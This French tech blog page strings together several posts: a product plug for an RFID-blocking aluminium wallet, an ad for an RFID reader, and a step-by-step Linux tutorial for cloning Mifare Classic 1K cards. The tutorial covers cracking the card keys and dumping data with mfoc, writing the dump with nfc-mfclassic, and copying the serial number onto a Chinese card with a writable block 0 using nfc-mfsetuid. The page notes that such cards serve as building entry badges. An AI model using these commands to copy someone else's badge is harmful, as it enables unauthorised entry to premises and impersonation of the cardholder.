portefeuille-drif.jpg

Suite à mon précédent article sur le clonage de carte RFID, sachez qu'il est possible de protéger votre carte RFID contre les sniffers RFID qui pourraient se trouver à proximité de vous.

Ceci notamment grâce au portefeuille DRIF conçu par JP, le concepteur de la Keycard que je vous avais présenté il y a quelques semaines et dont le projet a été mis en standby pour le moment, le temps de récolter les fonds nécessaires pour l'usinage des pièces.

Voici une présentation vidéo du projet réalisée par l'auteur du portefeuille geek :

Ce portefeuille est constitué de trois plaques en aluminium tenues par des élastiques. Du coup, en plus d'être solide, ce portefeuille tient parfaitement dans votre poche et peut protéger votre carte de crédit contre la casse et contre le sniffing si celle-ci est équipée d'une puce RFID. C'est le portefeuille idéal pour les sorties en boite ;-)

Si vous trouvez ce projet intéressant et original, sachez que le portefeuille DRIF est en vente au prix de 23,90€ sur portefeuilledrif.com.

Un produit original geek et pratique, ça n'a pas de prix ;-)

Les cartes RFID Mifare 1K possèdent deux protections principales :

  • Le block 0 est en lecture seule, seul le constructeur de la carte peut initialiser ce block.
  • Les données écrites sur les cartes sont encryptées.

Il existe cependant des solutions pour outrepasser ces protections et permettre de créer des copies exactes. Cet article détaille la procédure pour cloner une carte RFID Mifare 1k sous Linux.

Remarque importante : Avant toute chose, sachez que les commandes indiquées dans cet article peuvent détruire le contenu de votre carte RFID en cas d'erreur manipulation.

1. Achat d'une carte RFID Chinoise

La première étape consiste à se procurer une carte chinoise avec une backdoor pour écrire sur le block 0.

Ces cartes ne sont pas simples à trouver sur la toile et coûtent environ 25$.
Leur backdoor physique permet de modifier le contenu du block 0 qui est normalement en lecture seule sur des cartes classiques.

Ce backdoor permet ainsi de faire passer ces cartes chinoises pour n'importe quelle carte Mifare 1K existante.
Dans cet article, j'ai utilisé une carte procurée par le site xfpga pour valider les commandes shell.

2. Préparation de l'environnement Linux

La solution la plus simple pour obtenir tous les outils Linux permettant de hacker des cartes Mifare est de télécharger le Live CD Openpcd qui fournit en standard tous les outils déjà compilés. Il est possible que la distribution Backtrack contienne un certain nombre d'outils, mais je n'ai pas fait le test.

Une fois l'ISO téléchargée et le contenu de l'ISO placé sur la clef USB avec un outil comme Unetbootin par exemple, il vous suffit de redémarrer votre PC et de le faire booter sur la clef USB.

3. Dump/Cracking des cartes

La troisième étape consiste à créer des "dump" des deux cartes : La carte chinoise et la carte à copier.

Mais aussi de casser les clefs d'encryptage utilisées sur la carte à copier pour permettre une recopie exacte des données stockées dans la carte à copier.

// Placez la carte chinoise sur votre lecteur :
# mfoc -P 500 -O carte-chinoise.dmp
// Placez la carte à copier sur votre lecteur :
# mfoc -P 500 -O carte-a-copier.dmp

4. Recopie du contenu

La quatrième étape consiste à copier le contenu de la carte sur la carte chinoise :

// Placez la carte chinoise votre lecteur :
# nfc-mfclassic w a carte-a-copier.dmp carte-chinoise.dmp

5. Modification du numéro de série

La dernière étape consiste à modifier le numéro de série de la carte choinoise avec le numéro de série de la carte copiée.

// Placez la carte à copier votre lecteur :
# nfc-list

Le numéro de la carte s'affiche, gardez-le de coté. Remplacez les XXXXX par le numéro de série de la carte.

// Placez la carte chinoise votre lecteur :
# nfc-mfsetuid XXXXXX

Vérifiez que le numéro de série de votre carte chinoise est identique à votre carte.

# nfc-list

Vous voilà avec deux cartes RFID identiques, merci les chinois ! ;-)

mifare.jpg

Vous souhaitez créer un double exacte d'une carte RFID de type Mifare 1K ?

Les cartes Mifare 1K sont généralement utilisées comme badges d'entrée dans des locaux. Elles fournissent 768 octets de stockage répartis sur 16 secteurs. Chaque secteur est composé de 3 blocs de 16 octets.

Le bloc 0 contient l'identifiant unique de la carte. Celui-ci est protégé par défaut en écriture par les constructeurs des cartes. Cet identifiant stocké dans le bloc 0 par le constructeur de la carte est généralement utilisé comme identifiant principal des services qui utilisent ce type de carte. Seuls tous les autres blocs peuvent être lus et écrits par un lecteur / encodeur RFID à l'aide de LibNFC sous Linux par exemple.

Sauf qu'en Chine, tout est permis !

Vous pouvez trouver des cartes RFID Mifare 1K avec le block 0 en lecture / écriture sur le site xfpga. C'est le seul fournisseur "officiel" que j'ai trouvé sur la toile ...
Elles sont commercialisées au prix de 25$, il faut prévoir un coût d'envoi de 8$. A titre de comparaison, une carte Mifare 1K coûte moins d'un euro.

Ces cartes permettent normalement de pouvoir faire un clone exacte d'une carte RFID existante, y compris le bloc 0.
Si vous pensiez que les cartes RFID représentent une solution sécurisée d'accès à des locaux, je viens de vous faire changer d'avis ;-)

Update : La suite de l'histoire dans cet article

13-56Mhz-RFID-R-W-Triple-Protocol-USB-YHY638FU-SDK-Utility-Software-TAGS.jpg

Une envie de découvrir le contenu de vos cartes RFID et d'en modifier le contenu ?

Voici une boutique la boutique Aliexpress du fabricant Ehuoyan :
http://www.aliexpress.com/store/101297/all-wholesale-products.html

Je vous conseille le lecteur / enregistreur YHY638FU qui est livré avec de multiples applications, un SDK et de la documentation.

Profitez-en, c'est la période des soldes, le lecteur possède actuellement une réduction de 20%.

pub-rfid.jpg

Vous pouvez commander en direct si vous souhaitez payer par Paypal :
http://www.ehuoyan.com/english/press_display.asp?pid=11&id=227

Le lecteur est compatible avec de nombreux types de cartes, notamment les cartes Mifare 1K (S50) que l'on retrouve un peu partout.

Attention ce lecteur n'est pas compatible avec :

  • Les cartes Navigo
  • Les tags RFID des Nabaztag et des Karotz
  • Les puces 125 Mz

NB : Ne comptez pas faire des copies de cartes, le block 0 contenant l'UID des cartes est en lecture seule (ou pas) ;-)

revue,blog,news,geek


bullet Abonnez-vous à ces revues par feed rss news geek ou par email news geek
bullet Découvrez les anciennes revues